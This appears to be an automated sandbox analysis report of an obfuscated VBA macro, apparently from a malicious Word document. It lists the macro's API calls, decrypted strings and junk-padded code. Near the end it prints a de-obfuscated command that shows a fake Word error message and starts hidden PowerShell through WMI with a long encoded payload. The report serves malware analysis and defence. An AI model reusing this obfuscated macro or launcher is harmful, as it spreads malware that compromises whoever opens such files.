                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Ty8salh27qds_

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: dwJWfYEzQ

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: vkAhEABKZ

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: Close

                                        Part of subcall function Zacj6cs0xxmkchq@A81c_pcot0t3c8: LXJdHABRP

                                        ODgRUaAId

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        uLRAyCA

                                        Close

                                        LBFSC

                                        YBonG

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        noyuzC

                                        Close

                                        gxwmz

                                        StringsDecrypted Strings
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB"
                                        "CljNpAVDuUTJuHv"
                                        "RVkNwtRXUzC"
                                        "DTeWBCeIuXcgIDGC"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU"
                                        "yfwQBHQfgeJbFJB"
                                        "lObhAqBUYxXfy"
                                        "RmgSBGJYhhoQDxVIT"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ"
                                        "eKjGCADVsuMVfjHhDc"
                                        "mMpvHwuBnnrqGyIFq"
                                        "hWxuzXUxYdWuBHC"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "LhykJB:\jTdNFUJ\PnxpBEA.YspSlC"
                                        "hDlEFEcAPqOXZqg"
                                        "WVtJEvzwejAL"
                                        "YIyOHHHeDXloKIBE"
                                        LineInstructionMeta Information
                                        197

                                        Function Slz39ct0lz_ksnd(Oap3dn26wvi2z)

                                        198

                                        On Error Resume Next

                                        executed
                                        199

                                        Goto fdLCFDmF

                                        200

                                        Dim WqyIx as Object

                                        201

                                        Set fqoDE = yKTqX

                                        yKTqX

                                        yKTqX

                                        yKTqX

                                        yKTqX

                                        yKTqX

                                        202

                                        Set WqyIx = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        203

                                        Dim fdLCFDmF as Object

                                        204

                                        Set fdLCFDmF = WqyIx.CreateTextFile("ylDMcFB:\AAOOMAKJq\xwBWuI.IOYsGSuDB")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        205

                                        fdLCFDmF.WriteLine "CljNpAVDuUTJuHv"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        206

                                        fdLCFDmF.WriteLine "RVkNwtRXUzC"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        207

                                        fdLCFDmF.WriteLine "DTeWBCeIuXcgIDGC"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        208

                                        Set eDbUAXI = PdhtG

                                        PdhtG

                                        PdhtG

                                        PdhtG

                                        PdhtG

                                        PdhtG

                                        209

                                        fdLCFDmF.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        210

                                        Set WqyIx = Nothing

                                        211

                                        Set mbDbF = QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        QAhNFQ

                                        212

                                        Set fdLCFDmF = Nothing

                                        212

                                        fdLCFDmF:

                                        214

                                        X_3mj_vfdq5m9 = Oap3dn26wvi2z

                                        215

                                        Goto tfgmN

                                        216

                                        Dim tNvqYU as Object

                                        217

                                        Set GzGtFB = WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        WOdrGBJG

                                        218

                                        Set tNvqYU = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        219

                                        Dim tfgmN as Object

                                        220

                                        Set tfgmN = tNvqYU.CreateTextFile("sGEGIHLHI:\qsyPj\EiYLgCIK.EdPNHU")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        221

                                        tfgmN.WriteLine "yfwQBHQfgeJbFJB"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        222

                                        tfgmN.WriteLine "lObhAqBUYxXfy"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        223

                                        tfgmN.WriteLine "RmgSBGJYhhoQDxVIT"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        224

                                        Set fxJTHGJF = GPfHF

                                        GPfHF

                                        GPfHF

                                        GPfHF

                                        GPfHF

                                        GPfHF

                                        225

                                        tfgmN.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        226

                                        Set tNvqYU = Nothing

                                        227

                                        Set qhuKHDC = hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        hKjoxAHI

                                        228

                                        Set tfgmN = Nothing

                                        228

                                        tfgmN:

                                        230

                                        Vald5avf9551m1u9_q = Zacj6cs0xxmkchq(X_3mj_vfdq5m9)

                                        231

                                        Goto JJetH

                                        232

                                        Dim MeLoxDCJT as Object

                                        233

                                        Set EcBqJBVE = ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        ODgRUaAId

                                        234

                                        Set MeLoxDCJT = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        235

                                        Dim JJetH as Object

                                        236

                                        Set JJetH = MeLoxDCJT.CreateTextFile("VixyO:\QYvZJLAY\DkDtKB.ACnqoxJ")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        237

                                        JJetH.WriteLine "eKjGCADVsuMVfjHhDc"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        238

                                        JJetH.WriteLine "mMpvHwuBnnrqGyIFq"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        239

                                        JJetH.WriteLine "hWxuzXUxYdWuBHC"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        240

                                        Set ixuyHGriH = uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        uLRAyCA

                                        241

                                        JJetH.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        242

                                        Set MeLoxDCJT = Nothing

                                        243

                                        Set XSlyHJ = LBFSC

                                        LBFSC

                                        LBFSC

                                        LBFSC

                                        LBFSC

                                        LBFSC

                                        244

                                        Set JJetH = Nothing

                                        244

                                        JJetH:

                                        246

                                        Slz39ct0lz_ksnd = Vald5avf9551m1u9_q

                                        247

                                        Goto hgvZG

                                        248

                                        Dim TmGkDL as Object

                                        249

                                        Set QCDEyAHw = YBonG

                                        YBonG

                                        YBonG

                                        YBonG

                                        YBonG

                                        YBonG

                                        250

                                        Set TmGkDL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        CreateObject

                                        251

                                        Dim hgvZG as Object

                                        252

                                        Set hgvZG = TmGkDL.CreateTextFile("LhykJB:\jTdNFUJ\PnxpBEA.YspSlC")

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        CreateTextFile

                                        253

                                        hgvZG.WriteLine "hDlEFEcAPqOXZqg"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        254

                                        hgvZG.WriteLine "WVtJEvzwejAL"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        255

                                        hgvZG.WriteLine "YIyOHHHeDXloKIBE"

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        256

                                        Set FrVPCyW = noyuzC

                                        noyuzC

                                        noyuzC

                                        noyuzC

                                        noyuzC

                                        noyuzC

                                        257

                                        hgvZG.Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        Close

                                        258

                                        Set TmGkDL = Nothing

                                        259

                                        Set kggQZcCIE = gxwmz

                                        gxwmz

                                        gxwmz

                                        gxwmz

                                        gxwmz

                                        gxwmz

                                        260

                                        Set hgvZG = Nothing

                                        260

                                        hgvZG:

                                        262

                                        End Function

                                        Function Zacj6cs0xxmkchq, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034
                                        APIsMeta Information

                                        Leedy8frqauxr

                                        bzYfQcEHB

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        xZGeAsHP

                                        Close

                                        naqcFCA

                                        Replace

                                        		Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAA]anw[3gAH]anw[3MAZ]anw[3QBU]anw[3AC0]anw[3ASQ]anw[3B0A]anw[3EUA]anw[3TQA]anw[3gAC]anw[3AAd]anw[3gBh]anw[3AFI]anw[3AaQ]anw[3BBA]anw[3EIA]anw[3TAB]anw[3FAD]anw[3oAM]anw[3AA5]anw[3AFA]anw[3AIA]anw[3AgA]anw[3CgA]anw[3WwB]anw[3UAH]anw[3kAU]anw[3ABF]anw[3AF0]anw[3AKA]anw[3AiA]anw[3HsA]anw[3MAB]anw[39AH]anw[3sAM]anw[3wB9]anw[3AHs]anw[3AMg]anw[3B9A]anw[3HsA]anw[3MQB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BTA]anw[3HkA]anw[3JwA]anw[3sAC]anw[3cAY]anw[3wB0]anw[3AE8]anw[3Acg]anw[3BZA]anw[3CcA]anw[3LAA]anw[3nAC]anw[34Aa]anw[3QBv]anw[3AC4]anw[3ARA]anw[3BJA]anw[3HIA]anw[3RQA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3AHQ]anw[3AZQ]anw[3BNA]anw[3CcA]anw[3KQA]anw[3pAC]anw[3AAI]anw[3AA7]anw[3ACA]anw[3AIA]anw[3AgA]anw[3HMA]anw[3ZQB]anw[3UAC]anw[30Aa]anw[3QB0]anw[3AEU]anw[3ATQ]anw[3AgA]anw[3CgA]anw[3JwB]anw[3WAC]anw[3cAK]anw[3wAn]anw[3AEE]anw[3Acg]anw[3AnA]anw[3CsA]anw[3JwB]anw[3pAE]anw[3EAY]anw[3gBM]anw[3AEU]anw[3AOg]anw[3BhA]anw[3HYA]anw[3NQA]anw[3nAC]anw[3sAJ]anw[3wBM]anw[3ACc]anw[3AKw]anw[3AnA]anw[3G8A]anw[3UgA]anw[3nAC]anw[3kAI]anw[3AAg]anw[3ACg]anw[3AWw]anw[3B0A]anw[3FkA]anw[3cAB]anw[3lAF]anw[30AK]anw[3AAi]anw[3AHs]anw[3AMA]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NAB]anw[39AH]anw[3sAN]anw[3gB9]anw[3AHs]anw[3ANQ]anw[3B9A]anw[3HsA]anw[3MgB]anw[39AC]anw[3IAL]anw[3QBm]anw[3ACA]anw[3AJw]anw[3BTA]anw[3HkA]anw[3UwA]anw[3nAC]anw[3wAJ]anw[3wBl]anw[3AG0]anw[3ALg]anw[3BOA]anw[3GUA]anw[3VAA]anw[3uAF]anw[3MAZ]anw[3QBy]anw[3AHY]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3yAC]anw[3cAL]anw[3AAn]anw[3AEk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3YwB]anw[3lAH]anw[3AAb]anw[3wAn]anw[3ACw]anw[3AJw]anw[3B0A]anw[3E0A]anw[3YQB]anw[3uAG]anw[3EAZ]anw[3wAn]anw[3ACw]anw[3AJw]anw[3BJA]anw[3G4A]anw[3JwA]anw[3sAC]anw[3cAV]anw[3AAn]anw[3ACk]anw[3AIA]anw[3ApA]anw[3CAA]anw[3OwA]anw[3gAC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3ACc]anw[3AKw]anw[3AnA]anw[3GkA]anw[3bAB]anw[3lAG]anw[34AJ]anw[3wAp]anw[3ACs]anw[3AKA]anw[3AnA]anw[3HQA]anw[3bAB]anw[35AE]anw[3MAJ]anw[3wAr]anw[3ACc]anw[3Abw]anw[3BuA]anw[3HQA]anw[3JwA]anw[3pAC]anw[3sAJ]anw[3wBp]anw[3ACc]anw[3AKw]anw[3AoA]anw[3CcA]anw[3bgA]anw[3nAC]anw[3sAJ]anw[3wB1]anw[3AGU]anw[3AJw]anw[3ApA]anw[3CkA]anw[3OwA]anw[3kAE]anw[3QAO]anw[3AAx]anw[3AHY]anw[3AbA]anw[3A2A]anw[3GwA]anw[3PQA]anw[3kAF]anw[3AAM]anw[3QAy]anw[3AFI]anw[3AIA]anw[3ArA]anw[3CAA]anw[3WwB]anw[3jAG]anw[3gAY]anw[3QBy]anw[3AF0]anw[3AKA]anw[3A2A]anw[3DQA]anw[3KQA]anw[3gAC]anw[3sAI]anw[3AAk]anw[3AE8]anw[3AOQ]anw[3A4A]anw[3EUA]anw[3OwA]anw[3kAF]anw[3IAX]anw[3wAx]anw[3AFo]anw[3APQ]anw[3AoA]anw[3CcA]anw[3SwA]anw[3yAC]anw[3cAK]anw[3wAn]anw[3ADY]anw[3ARQ]anw[3AnA]anw[3CkA]anw[3OwA]anw[3gAC]anw[3AAK]anw[3ABH]anw[3AGM]anw[3AaQ]anw[3AgA]anw[3HYA]anw[3QQB]anw[3yAE]anw[3kAQ]anw[3QBC]anw[3AEw]anw[3AZQ]anw[3A6A]anw[3DAA]anw[3OQB]anw[3wAC]anw[3AAK]anw[3QAu]anw[3AFY]anw[3AQQ]anw[3BMA]anw[3HUA]anw[3ZQA]anw[36AD]anw[3oAI]anw[3gBD]anw[3AFI]anw[3ARQ]anw[3BhA]anw[3GAA]anw[3VAB]anw[3lAG],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 